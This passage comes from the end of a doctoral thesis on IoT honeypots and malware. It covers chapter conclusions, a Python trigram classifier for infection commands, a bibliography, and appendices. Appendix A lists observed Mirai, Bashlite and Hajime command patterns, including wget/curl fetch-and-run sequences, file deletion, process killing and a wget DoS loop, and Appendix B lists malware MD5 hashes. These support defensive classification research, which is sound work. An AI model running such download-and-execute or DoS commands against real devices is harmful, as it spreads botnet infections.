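On a real device, find_suspects would be called with a whitelist built from the known-good firmware, and the returned PIDs would be candidates for termination. Checking the hash in addition to the pathname means that a binary that merely reuses a whitelisted pathname is still reported.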
In Chapter 4, we combined the capabilities of a transparent proxy and a web tracking library to
develop ThingGate, a supporting mechanism for honeypots consisting of physical IoT devices.
ThingGate can improve the security of the honeypot, extend the functionality of web tracking, and
manage the incoming traffic and the outgoing response content in a MITM manner. We evaluated
ThingGate on the public Internet and confirmed its effectiveness. In our observation, ThingGate
did not yield to cyber attacks against the physical devices, such as RCE attacks and long-term
peeping. In our experiments, we successfully tracked an attacker in the USA who used multiple IP
addresses to visit our honeypot. Regarding unwanted incoming flows, we showed that ThingGate can
block traffic that changes critical configurations. Moreover, ThingGate collected 149 malware
binaries and 23 scripts from 411 misplaced CI-URLs, which employed seven vulnerabilities.
Furthermore, using fabricated APs, ThingGate fooled seven clients who requested the Wi-Fi AP list
in the WebUI.
In Chapter 5, we analyzed 22.9 GB of Telnet logs and 5,616 different malware binaries collected by
the IoT honeypot. We filtered 2.7 million infection logs, mapped them to 44,834 ECTs, and conducted
classification and clustering analysis on the ECTs. The confusion tables and the accuracy of our
classification method led to several definite conclusions. First, the lowest accuracy over all the
ECTs was 0.9675, indicating that our method remained valid even for a dataset spanning nine months.
Although command sequences can change many times, trigram features can accurately
distinguish Mirai, Bashlite, and Hajime malware based on differences in their infection command
patterns. These malware categories have distinctive command patterns, and the hidden features
can be extracted for further analysis. Second, we demonstrated that clustering with trigram
sequences can detect variant attack patterns (for example, the wget DoS attack) and facilitate the
identification of similarities between different malware families without requiring the collection
of malware binaries.
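To make the trigram idea concrete, the following Python sketch extracts word-level trigrams from an infection command sequence and assigns a family by the most similar labelled example. The whitespace tokenization, the Jaccard similarity, and the nearest-example rule are assumptions chosen for brevity. They stand in for, and are not, the classifiers evaluated in Chapter 5. The example command strings are taken from Appendix A.

```python
from typing import Dict, List, Set, Tuple

Trigram = Tuple[str, ...]


def trigrams(commands: str) -> Set[Trigram]:
    """Split a command sequence on whitespace and collect its word trigrams."""
    tokens = commands.split()
    return {tuple(tokens[i:i + 3]) for i in range(len(tokens) - 2)}


def jaccard(a: Set[Trigram], b: Set[Trigram]) -> float:
    """Jaccard similarity of two trigram sets (0.0 when both are empty)."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def classify(sample: str, labelled: Dict[str, List[str]]) -> str:
    """Return the family of the most similar labelled example, or "Unknown"."""
    features = trigrams(sample)
    best_family, best_score = "Unknown", 0.0
    for family, examples in labelled.items():
        for example in examples:
            score = jaccard(features, trigrams(example))
            if score > best_score:
                best_family, best_score = family, score
    return best_family


# Labelled command patterns copied from Appendix A.
LABELLED = {
    "Mirai": ["/bin/busybox ECCHI, /bin/busybox ps;"],
    "Bashlite": ["cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var"],
    "Hajime": ["(dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s),"],
}

print(classify("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /", LABELLED))
```

Because the features come from the observed command sequence alone, a sample can be assigned to a family without obtaining the malware binary, which is the property the chapter emphasizes.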
In Chapter 6, we showed that IoTProtect is a valid solution that can remove IoT malware
processes with reasonable implementation and resource costs. Moreover, we implemented a shell
script prototype and showed that it could be executed successfully on low-cost IoT devices, such
as Wi-Fi routers and storage devices, at marginal cost. We tested more than four thousand different
IoT malware binaries, and IoTProtect successfully removed 99.92% of these malicious processes.
7.2 Future works
Cyber attacks in IoT keep evolving, and their purposes keep diversifying. In this study, we used
honeypots to observe existing attacks, analyzed the threats, and applied the findings to implement
a whitelist-based protection method. We think that extending the observation scope to more
protocols and deeper into local area networks (LANs) is essential. The knowledge obtained from
honeypots and analysis can also be used to protect devices proactively, for example through an IDS
or an early-warning system that detects newly evolving attacks. Thus, future work should focus on
how to implement advanced honeypots and network-based countermeasures against cyber attacks in IoT.
Bibliography
[1] L. J., Rivera, and L., Goasduff, "Gartner says a thirty-fold increase in internet-connected
physical devices by 2020 will significantly alter how the supply chain operates," Gartner,
https://www.gartner.com/newsroom/id/2688717, accessed Jan. 18. 2019.
[2] P., Loshin, “Details emerging on Dyn DNS DDoS attack, Mirai IoT botnet,” TechTarget
network, http://searchsecurity.techtarget.com/news/450401962/Details-emerging-on-Dyn-DNS-DDoS-attack-Mirai-IoT-botnet,
accessed Feb. 06. 2019.
[3] R., Nigam, “Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns,” Unit42,
https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-
campaigns/, accessed Feb. 06. 2019.
[4] Y.M.P., Pa, S., Suzuki, K., Yoshioka, T., Matsumoto, T. Kasama, and C., Rossow, “IoTPOT:
A Novel Honeypot for Revealing Current IoT Threats,” Journal of Information Processing,
Vol.24, No.3, pp.522–533, 2016.
[5] J. D., Guarnizo, A., Tambe, S. S., Bhunia, M., Ochoa, N. O., Tippenhauer, A., Shabtai, & Y.,
Elovici, “Siphon: Towards scalable high-interaction physical honeypots,” In Proceedings of
the 3rd ACM Workshop on Cyber-Physical System Security, pp. 57-68, April, 2017.
[6] T., Luo, Z., Xu, X., Jin, Y., Jia, & X., Ouyang, "Iotcandyjar: Towards an intelligent-
interaction honeypot for iot devices." Black Hat, 2017.
[7] Y., Ezawa, K., Tamiya, S., Nakayama, Y., Tie, K., Yoshioka, and T., Matsumoto, “An
Analysis of Attacks Targeting WebUI of Embedded Devices by Bare-metal Honeypot,” In
Computer Security Symposium 2017, Oct., 2017.
[8] M., Kuzin, Y., Shmelev, and V., Kuskov, "New trends in the world of IoT threats," AO
Kaspersky Lab, https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/,
accessed Feb. 6. 2019.
[9] Carnegie Mellon University. "The ‘Only’ Coke Machine on the Internet,"
https://www.cs.cmu.edu/~coke/history_long.txt, accessed Feb. 6. 2019.
[10]R.S., Raji, "Smart networks for control." IEEE spectrum 31, no. 6 (1994): 49-55.
[11]K., Ashton, "That ‘internet of things’ thing." RFID Journal 22, no. 7 (2009): 97-114.
[12]H., Eero, J., Grönvall, and K., Främling. "Tracking and tracing parcels using a distributed
computing approach." Proceedings of the 14th Annual conference for Nordic researchers in
logistics (NOFOMA'2002), Trondheim, Norway. 2002.
[13]E., Dave. "The internet of things: How the next evolution of the internet is changing
everything." CISCO white paper 1, no. 2011
[14]R., Puri, "Bots & Botnet: An Overview," SANS Institute. https://www.sans.org/reading-
room/whitepapers/malicious/bots-botnet-overview-1299, accessed June. 20. 2019.
[15]A. Tellez, “Bashlite,” GitHub, https://github.com/anthonygtellez/BASHLITE, accessed
Jan. 18. 2019.
[16]A., Manos, T., April, M., Bailey, M., Bernhard, E., Bursztein, J., Cochran, Z., Durumeric et
al. "Understanding the mirai botnet." In 26th USENIX Security Symposium (USENIX
Security 17), pp. 1093-1110. 2017.
[17]K., Tamiya, Y., Ezawa, Y., Tie, S., Nakayama, K., Yoshioka, and T., Matsumoto,
"Observation of Peeping using Decoy IP Camera," In Symposium on Cryptography and
Information Security 2018, Jan., 2018.
[18]T. F. Yen, V. Heorhiadi, A. Oprea, M. K. Reiter, and A. Juels, “An epidemiological study of
malware encounters in a large enterprise,” In Proceedings of the 2014 ACM SIGSAC
Conference on Computer and Communications Security, ACM, pp. 1117-1130, 2014.
[19]M. M. Masud, L. Khan and B. Thuraisingham, “A scalable multi-level feature extraction
technique to detect malicious executables,” Information Systems Frontiers, vol. 10, no. 1,
pp. 33-45, 2008.
[20]M. Ahmadi, D. Ulyanov, S. Semenov, M. Trofimov, and G. Giacinto, “Novel feature
extraction, selection and fusion for effective malware category classification,” In
Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy,
ACM, pp. 183-194, 2016.
[21]J. Drew, T. Moore, and M. Hahsler, “Polymorphic Malware Detection Using Sequence
Classification Methods”, In Proceedings of 2016 IEEE Security and Privacy Workshops
(SPW), 2016.
[22]F. Shahzad and M. Farooq, “ELF-Miner: using structural knowledge and data mining
methods to detect new (Linux) malicious executables,” Knowledge and information
systems, vol. 30, no. 3, pp. 589-612, 2012.
[23]J. Bai, Y. Yang, S. Mu, and Y. Ma, “Malware detection through mining symbol table of
Linux executables,” Information Technology Journal, vol. 12, no. 2, pp. 380-384, 2013.
[24]X. Wang, W. Yu, A. Champion, X. Fu, and D. Xuan, “Detecting worms via mining dynamic
program execution,” In Proceedings of 2007 Third International Conference on Security and
Privacy in Communications Networks and the Workshops - SecureComm 2007, pp. 412-
421, 2007.
[25]Ham, Hyo-Sik, et al. “Linear SVM-based android malware detection for reliable IoT
services.” Journal of Applied Mathematics, vol. 2014, 2014.
[26]Azmoodeh, Amin, Ali Dehghantanha, and Kim-Kwang Raymond Choo. "Robust Malware
Detection for Internet Of (Battlefield) Things Devices Using Deep Eigenspace Learning."
IEEE Transactions on Sustainable Computing, 2018.
[27]J. Su, D. V. Vargas, S. Prasad, D. Sgandurra, Y. Feng, and K. Sakurai, “Lightweight
Classification of IoT Malware based on Image Recognition,” In Proceedings of 2018 IEEE
42nd Annual Computer Software and Applications Conference (COMPSAC), Tokyo, Japan,
2018.
[28]H., Pareek, S., Romana, and P. R. L. Eswari,(2012). “Application whitelisting: approaches
and challenges.” International Journal of Computer Science, Engineering and Information
Technology (IJCSEIT), 2(5).
[29]S., Obermeier, R., Schierholz, and A., Hristova,(2014, September). “Securing industrial
automation and control systems using application whitelisting.” In Emerging Technology
and Factory Automation (ETFA), 2014 IEEE (pp. 1-4). IEEE.
[30]R., Bhardwaj, M., Daftari, D., John, N., Shinde, and V.Deshpande, (2015). “Whitelisting
and Blacklisting for Private Execution of Processes” in Linux
[31]“Debsums - check the MD5 sums of installed Debian packages.”
http://manpages.ubuntu.com/manpages/zesty/en/man1/debsums.1.html, accessed June 21,
2019.
[32]R., Paleari, L., Martignoni, E., Passerini, D., Davidson, M., Fredrikson, J. T., Giffin, and S.,
Jha, (2010, August). “Automatic Generation of Remediation Procedures for Malware
Infections.” In USENIX Security Symposium, pp. 419-434.
[33]F., Shahzad, S., Bhatti, M., Shahzad, and M., Farooq, (2011, June). “In-execution malware
detection using task structures of linux processes.” In Communications (ICC), 2011 IEEE
International Conference on (pp. 1-6). IEEE.
[34]K., Tamiya, S., Nakayama, Y., Ezawa, Y., Tie, C., Wu, D., Yang, K., Yoshioka, and T.
Matsumoto, (2017). “Experiment on removal and prevention of IoT malware using real
devices.” In Symposium on Cryptography and Information Security 2017, Session 3E1-5,
Naha, Japan, 2017.
[35]M., Koike, N., Ogura, S., Takumi, Y., Hanatani, and H. Haruki, (2017). “Development of
WhiteEgret™: A Whitelisting-type Execution Control on Linux.” In Computer Security
Symposium 2017, Session 3D3-4, Yamagata, Japan, 2017.
[36]E., Cozzi, M., Graziano, Y., Fratantonio, and D., Balzarotti. "Understanding linux malware."
In 2018 IEEE Symposium on Security and Privacy (SP), pp. 161-175. IEEE, 2018.
[37]D., Goodin, "BrickerBot, the permanent denial-of-service botnet, is back with a vengeance,"
ARS TECHNICA, https://arstechnica.com/information-technology/2017/04/brickerbot-the-
permanent-denial-of-service-botnet-is-back-with-a-vengeance/, accessed Feb. 06. 2019.
[38]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION
WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-
execution-cve-2017-17020/, accessed Feb. 06. 2019.
[39]M., Jakobsson, and Z., Ramzan, "Crimeware: understanding new attacks and defenses,"
pp17-19, Addison-Wesley Professional, 2008.
[40]A., Luotonen, and K., Altis, "World-wide web proxies," Computer Networks and ISDN
systems, 27(2), pp147-154, 1994.
[41]PF (4), https://www.freebsd.org/cgi/man.cgi?pf, accessed Feb. 06. 2019.
[42]Rieger, G., socat (1) - Linux man page, https://linux.die.net/man/1/socat, accessed Feb. 06.
2019.
[43]P. Eckersley, "How unique is your web browser?" In International Symposium on Privacy
Enhancing Technologies Symposium, pp. 1-18. Springer, Berlin, Heidelberg, July, 2010.
[44]K., Mowery, and H., Shacham, “Pixel perfect: Fingerprinting canvas in HTML5.” In
Proceedings of W2SP, pp1-12, 2012
[45]G., Acar, C., Eubank, S., Englehardt, M., Juarez, A., Narayanan, and C., Diaz, "The web
never forgets: Persistent tracking mechanisms in the wild," In Proceedings of the 2014 ACM
SIGSAC Conference on Computer and Communications Security, pp. 674-689, Nov, 2014.
[46]P., Raschke, and A., Küpper, "Uncovering Canvas Fingerprinting in Real-Time and
Analyzing its Usage for Web-Tracking," In Workshops der INFORMATIK 2018-
Architekturen, Prozesse, Sicherheit und Nachhaltigkeit. Köllen Druck+ Verlag GmbH, 2018.
[47]"Valve/fingerprintjs2", https://github.com/Valve/fingerprintjs2, accessed Feb. 06. 2019.
[48]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION
WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-
execution-cve-2017-17020/, accessed Feb. 06. 2019.
[49]METASPLOIT, "D-Link DSL-2750B - OS Command Injection (Metasploit),"
https://www.exploit-db.com/exploits/44760, accessed Feb. 06. 2019.
[50]"Kernel and Device Drivers Layer,"
https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Tech
nology_Overview/SystemTechnology/SystemTechnology.html, accessed Feb. 06. 2019.
[51]”mitmproxy”, https://mitmproxy.org/, accessed Feb. 06. 2019.
[52]S., Henning, A. Rao, and R., Lanphier, "Real time streaming protocol (RTSP),"
https://www.ietf.org/rfc/rfc2326.txt, accessed Feb. 06. 2019.
[53]P., Alan, L., Farrell, D., Kemp, and W. Lupton. "Upnp device architecture 1.1." In UPnP
Forum, vol. 22. 2008.
[54]Z., PENG and C., WU, "Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote
Buffer Overflow," Exploit Database, https://www.exploit-db.com/exploits/41738, accessed
Feb. 06. 2019.
[55]METASPLOIT, “D-Link DCS-930L - (Authenticated) Remote Command Execution
(Metasploit),” https://www.exploit-db.com/exploits/39437, accessed Feb. 06. 2019.
[56]Google, "," https://support.google.com/webmasters/answer/182072?hl=en, accessed Feb.
06. 2019.
[57]Google, "Verifying Googlebot," https://support.google.com/webmasters/answer/80553,
accessed Feb. 06. 2019
[58]VULNSPY, "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution," https://www.exploit-
db.com/exploits/45978, accessed Feb. 06. 2019.
[59]G., Eberhardt, "AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities,"
https://www.exploit-db.com/exploits/40500, accessed Feb. 06. 2019.
[60]CORE SECURITY, "AirLink101 SkyIPCam1620W - OS Command Injection,"
https://www.exploit-db.com/exploits/37527, accessed Feb. 06. 2019.
[61]Procode701, "Fastweb FASTGate - 0.00.67 RCE Vulnerability,"
https://cxsecurity.com/issue/WLB-2018100117, accessed Feb. 06. 2019.
[62]"CVE-2018-14847," https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847,
accessed Feb. 06. 2019.
[63]HOUSSAMIX, "TUTOS 1.3 - 'cmd.php' Remote Command Execution,"
https://www.exploit-db.com/exploits/4861, accessed Feb. 06. 2019.
[64]VirusTotal, "Analyze suspicious files and URLs to detect types of malware, automatically
share them with the security community," https://www.virustotal.com/#/home/upload,
accessed Feb. 06. 2019.
[65]B. Krebs, “Source Code for IoT Botnet ‘Mirai’ Released,”
https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-Mirai-released/, accessed
Jan. 18. 2019.
[66]J. Gamblin, “Mirai-Source-Code,” GitHub, https://github.com/jgamblin/Mirai-Source-
Code/, accessed Jan. 18. 2019.
[67]W. H. Gomaa and A. A. Fahmy, “A survey of text similarity approaches," International
Journal of Computer Applications, vol. 68, no. 13, pp. 13-18, 2013.
[68]M., Christopher, P., Raghavan, and H., Schütze. "Introduction to information retrieval."
Natural Language Engineering 16.1 (2010), pp. 100-103.
[69]Ukkonen, Esko. "Approximate string-matching with q-grams and maximal matches."
Theoretical computer science 92 no.1 (1992), pp. 191-211
[70]M., Sharma, N., Rajpal, R. B., Reddy, and K. R., Purwar, (2013). Normalised LCS-based
method for indexing multidimensional data cube. International Journal of Intelligent
Information and Database Systems, 7(2), pp. 180-204.
[71]Bakkelund, Daniel. "An LCS-based string metric." Oslo, Norway: University of Oslo
(2009).
[72]Heeringa, Wilbert Jan. "Measuring dialect pronunciation differences using Levenshtein
distance." PhD diss., University Library Groningen, pp. 130-132. 2004.
[73]Dreßler, Kevin, and Axel-Cyrille Ngonga Ngomo. "On the efficient execution of bounded
jaro-winkler distances." Semantic Web 8.2 (2017), pp. 185-196.
[74]D. Davidson, “linux.mirai,” https://github.com/0x27/, accessed Jan. 18. 2019.
[75]G. Kondrak, “N-gram similarity and distance,” In International Symposium on String
Processing and Information Retrieval, Springer Berlin Heidelberg, pp.115-126, 2005.
[76]P. F. Brown, P. V. Desouza, R. L. Mercer, V. J. D. Pietra, and J. C. Lai, “Class-based n-gram
models of natural language,” Computational linguistics, vol. 18, no. 4, pp. 467-479, 1992.
[77]I. H. Witten, E. Frank, and M. A. Hall, “Data Mining: Practical machine learning tools and
techniques,” Morgan Kaufmann, 2016.
[78]M. Bailey et al. “Automated classification and analysis of internet malware”. In: Recent
Advances in Intrusion Detection. Ed. by C. Kruegel, L. Lippmann, and Clark Andrew. Vol.
4637. Lecture Notes in Computer Science, pp. 178–197, 2007
[79]Joachims, Thorsten. "Text categorization with support vector machines: Learning with
many relevant features," In European conference on machine learning, pp. 137-142, 1998.
[80]Hotho, Andreas, Andreas Nürnberger, and Gerhard Paaß. "A brief survey of text mining." In
Ldv Forum, vol. 20, no. 1, pp. 19-62, 2005
[81]K. P. Murphy, “Naive bayes classifiers,” University of British Columbia, 2006.
[82]I. Rish, “An empirical study of the naive Bayes classifier,” In IJCAI 2001 workshop on
empirical methods in artificial intelligence, vol. 3, no. 22, pp. 41-46, 2001.
[83]K. Sato, “An inside look at google bigquery. White paper”, Google,
https://cloud.google.com/files/BigQueryTechnicalWP.pdf, accessed Jan. 18. 2019.
[84]F. Pedregosa et al., "Scikit-learn: Machine learning in Python", Journal of Machine
Learning Research, vol. 12, pp. 2825-2830, Oct. 2011.
[85]die.net, “ptmx(4) - Linux man page,” https://linux.die.net/man/4/ptmx, accessed Jan. 18.
2019.
[86]J. Trost, “7up (Mirai?) Triage, More IoT Malware Targeting Weak Passwords,”
http://www.covert.io/7up-mirai-triage-more-iot-malware-targeting-weak-passwords/,
accessed Jan. 18. 2019.
[87]C. Zheng, C. Xiao, and Y. Jia, “IoT Malware Evolves to Harvest Bots by Exploiting a Zero-
day Home Router Vulnerability,” Palo Alto Networks,
https://researchcenter.paloaltonetworks.com/2018/01/unit42-iot-malware-evolves-harvest-
bots-exploiting-zero-day-home-router-vulnerability/, accessed Jan. 18. 2019.
[88]E. Auchard, (2016, November 29). "Deutsche Telekom attack part of global campaign on
routers." https://www.reuters.com/article/us-deutsche-telekom-outages/deutsche-telekom-
attack-part-of-global-campaign-on-routers-idUSKBN13O0X4, accessed Nov. 26. 2017.
[89]L. Franceschi-Bicchierai, (2016, September 29). "How 1.5 Million Connected Cameras
Were Hijacked to Make an Unprecedented Botnet."
https://motherboard.vice.com/en_us/article/8q8dab/15-million-connected-cameras-ddos-
botnet-brian-krebs, accessed Nov. 26. 2017.
[90]McAfee, "Embedded Control." http://support.intelsecurity.com/us/products/embedded-
control.aspx, accessed Nov. 20. 2017.
[91]Kaspersky, "Embedded Systems Security 2.0."
https://support.kaspersky.com/kess2#requirements, accessed Nov. 19. 2017.
[92]"Supported embedded operating systems in OfficeScan 10.6."
https://success.trendmicro.com/solution/1060451-supported-embedded-operating-systems-
in-officescan-10-6, accessed Nov. 19. 2017.
[93]Symantec™, "Critical System Protection Version 5.2 RU9 MP6 Platform and Feature
Matrix."
https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUME
NTATION/8000/DOC8022/en_US/SCSP_Platform_Feature_Matrix.pdf?__gda__=1511283
679_42c5dda9b7a1075c7b46cc29d7137977, accessed Nov. 20. 2017.
[94]"User Guide McAfee Embedded Control 6.5.1."
https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATI
ON/25000/PD25615/en_US/mec_651_ug_en_us.pdf, accessed Nov.20. 2017.
[95]Symantec, "Critical System Protection 5.2.9 Installation Guide." https://origin-
symwisedownload.symantec.com/resources/sites/SYMWISE/content/live/DOCUMENTATI
ON/5000/DOC5944/en_US/SCSP_Installation_Guide.pdf, accessed Nov. 20. 2017.
[96]"What is GNU/Linux?" http://www.getgnulinux.org/en/linux/, accessed June 21. 2017.
[97]"Yocto Project." https://www.yoctoproject.org/, accessed Nov. 27. 2017.
[98]Yocto Project, "Linux Kernel Development Manual."
http://www.yoctoproject.org/docs/2.0.2/kernel-dev/kernel-dev.html, accessed Nov. 27. 2017.
[99]M., Mitchell, J., Oldham, and A. Samuel,(2001). Advanced linux programming (pp. 147-
156). New Riders.
[100]"Proc - process information pseudo-filesystem." http://man7.org/linux/man-
pages/man5/proc.5.html, accessed June 21. 2017.
[101]E. Brown, (2016, October 27). "Open Source Operating Systems for IoT."
https://www.linux.com/news/open-source-operating-systems-iot, accessed July 30. 2017.
[102]B. Nguyen, (2003). "Linux Filesystem Hierarchy."
[103]"fstab - static information about the filesystems." http://man7.org/linux/man-
pages/man5/fstab.5.html, accessed June 21. 2017.
[104]R. Landley, (2005, October 17). "Ramfs, rootfs and initramfs."
https://www.kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt, accessed
July 10. 2017.
[105]P., Lougher, and R., Lougher, (2008). "SquashFS."
[106]G., KH. (2009, August 5). "Driver Core: devtmpfs - kernel-maintained tmpfs-based /dev."
https://lwn.net/Articles/345480/, accessed July 10. 2017.
[107]P. Snyder, (1990, October). "tmpfs: A virtual memory filesystem." In Proceedings of the
autumn 1990 EUUG Conference, pp. 241-248.
[108]P., Mochel, (2005, July). "The sysfs filesystem." In Linux Symposium, p. 313.
[109]N. Brown, (2016, June 1). "Containers, pseudo TTYs, and backward compatibility."
https://lwn.net/Articles/688809/, accessed July 10. 2017.
[110]D. Woodhouse, (2001, July). "JFFS: The journalling flash filesystem." In Ottawa linux
symposium Vol. 2001.
[111]B., Hards, "The Linux USB sub-system." Sigma Bravo Pty Ltd,
http://www.linux-usb.org/USB-guide/book1.html, accessed June 21. 2017.
[112]"Vulnerability Details: CVE-2017-7253." http://www.cvedetails.com/cve/CVE-2017-
7253/, accessed July 30. 2017.
[113]C., Cimpanu, (2017, May 11). "40 Asus RT Router Models Are Vulnerable to Simple
Hacks." https://www.bleepingcomputer.com/news/security/40-asus-rt-router-models-are-
vulnerable-to-simple-hacks/, accessed July 30. 2017.
[114]T., Sudo (2016). 無線LAN機器、出荷停止 サイバー攻撃に悪用の恐れ [Shipment
of Wireless LAN equipment is suspended due to fear of abuse in cyber attacks],
http://www.asahi.com/articles/ASJDN5GJ5JDNUUPI00C.html, accessed July 30. 2017.
[115]"VirusTotal Public API v2.0." https://www.virustotal.com/en/documentation/public-api/,
accessed June 23. 2017
[116]F., Lardinois, (Sep. 7, 2012) "Google Acquires Online Virus, Malware and URL Scanner
VirusTotal." TechCrunch, https://techcrunch.com/2012/09/07/google-acquires-online-virus-
malware-and-url-scanner-virustotal/, accessed June 22. 2017.
[117]"IBM Watson IoT". https://github.com/ibm-watson-iot, accessed June 23. 2017.
[118]S., Nanz, and C. A., Furia, (2015, May). "A comparative study of programming languages
in Rosetta Code." In Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE
International Conference on Vol. 1, pp. 778-788. IEEE.
[119]J., Morris, S., Smalley, and G., Kroah-Hartman. (2002, August). "Linux security
modules: General security support for the linux kernel." In USENIX Security Symposium.
List of Papers
Reviewed papers in Journals
J-1) Chun-Jung Wu, Ying Tie, Satoshi Hara, Kazuki Tamiya, Akira Fujita, Katsunari
Yoshioka, and Tsutomu Matsumoto. "IoTProtect: Highly Deployable Whitelist-based
Protection for Low-cost Internet-of-Things Devices." Journal of Information Processing
Vol. 26, pp 662-672, Sept. 2018.
J-2) Chun-Jung Wu, Shin-Ying Huang, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT
Malware Analysis and New Pattern Discovery Through Sequence Analysis Using Meta-
Feature Information." The IEICE Transactions on Communications. Vol.E103-B,No.1,
Jan. 2020.
Papers in preparation for submission to Journals
J-3) Chun-Jung Wu, Katsunari Yoshioka, and Tsutomu Matsumoto. “ThingGate: A gateway
for managing traffic of bare-metal IoT honeypot.” Journal of Information Processing.
Technical Reports
T-1) Chun-Jung Wu, Ying Tie, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT malware
behavior analysis and classification using text mining algorithm." (2016). In Computer
Security Symposium (CSS), Akita, Japan, Oct. 2016.
T-2) Kazuki Tamiya, Sou Nakayama, Yuta Ezawa, Ying Tie, Chun-Jung Wu, Di Yang,
Katsunari Yoshioka, and Tsutomu Matsumoto. (2017). “Experiment on removal and
prevention of IoT malware using real devices.” In Symposium on Cryptography and
Information Security 2017, Session 3E1-5, Naha, Japan, 2017.
Appendix
Appendix A The text features and family of clusters
THE TEXT FEATURES AND FAMILY OF CLUSTERS.
Feature Id | ECT index / cluster size (*) | Cluster id | Text features | Family | Number of ECTs
1 | (4) | 25 | rm -rf ; pkill -9 ;killall -9 ;, shell, cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/* | Bashlite | 4
2 | 4224 | 26 | cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite | 1
3 | (10) | 21 | cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite (& Tsunami) | 10
4 | 3452 | 22 | >/dev/netslink/.t && cd /dev/netslink/ | Bashlite | 1
5 | 397 | 23 | cd /tmp; rm -fr *; wget/curl/tftp/get/ftpget, chmod, sh, rm | Bashlite | 1
6 | (37) | 20 | '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx && cd /dev/', '>/mnt/.ptmx && cd /mnt/', | Mirai variant | 37
7 | (9) | 19 | '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx && cd /dev/', '>/mnt/.ptmx && cd /mnt/', | Bashlite variant | 9
8 | 3665 | 24 | >/dev/.t && cd /dev/;>pppd, >/var/tmp/.t && cd /var/tmp/;>pppd, | Bashlite variant | 1
9 | (69) | 17 | /bin/busybox ECCHI, /bin/busybox ps; | Mirai | 69
10 | (3374) | 16 | /bin/busybox ECCHI, /bin/busybox ps; | Mirai | 3374
11 | 823 | 18 | /bin/busybox ECCHI, /bin/busybox ps; | Mirai | 1
12 | (4) | 15 | wget [url]l -O - > dvrHelper; chmod 777 ; /bin/busybox ECCHI | Mirai | 4
13 | (151) | 13 | (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), | Hajime | 151
14 | 2236 | 14 | (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), | Hajime | 1
15 | (2) | 12 | (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), | Hajime | 2
16 | 4080 | 11 | cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var | Bashlite | 1
17 | 3017 | 10 | cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var | Bashlite | 1
18 | (4) | 9 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite | 4
19 | 916 | 27 | busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf, cd /var || cd /tmp || cd /var/run || cd /var/tmp || cd /dev || cd /dev/shm || cd /mnt || cd /boot || cd /usr || cd /dev/netslink | Bashlite | 1
20 | (3) | 8 | sh || bash || shell, cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var | Bashlite | 3
21 | (2) | 6 | cd /tmp; wget || curl -O ; chmod 777 ; sh | Bashlite | 2
22 | 3703 | 7 | cd /tmp; wget || curl -O ; chmod 777 ; sh | Bashlite | 1
23 | (3) | 3 | sh, shell, help, busybox, wget | Mirai | 3
24 | 2520 | 4 | sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh || bash ; rm -rf ; | Mirai | 1
25 | 2896 | 5 | sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh || bash ; rm -rf ; | Mirai | 1
26 | (5) | 2 | chmod a+x 7up;./7up., system., /bin/busybox Mirai. | Mirai variant | 5
27 | 726 | 28 | cd /tmp, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite | 1
28 | 3921 | 29 | busybox wget || wget [url] || tftp [url]; sh | Bashlite | 1
29 | (934) | 1 | killall wget; killall ping; killall sh while true; do wget -O /dev/null [url] > /dev/null 2> | Unknown | 934
30 | 325 | 30 | /bin/busybox MIRAI., cd /var/tmp ;cd /tmp; rm -f *; ftpget, sh & | Mirai | 1
Appendix B The MD5 of malware Tsunami (April 2017, Feature ID 3 of Appendix A)
THE MD5 OF MALWARE TSUNAMI (APRIL 2017, FEATURE ID 3 OF APPENDIX A).
MD5
10f045aa890077adc300ea79686eefba
1920b61e9c1e001e2c651bc9ffd59b1a
196dfd58285222b20d6d3434645114e2
25060f2d2d53e80bf01e77ccbabab077
305f120d4893c293faeb368c31ab0913
4312ad5c366a7e500d23883617db8ead
4e9f282659dcc1cd3e9aa9df69d1f9ae
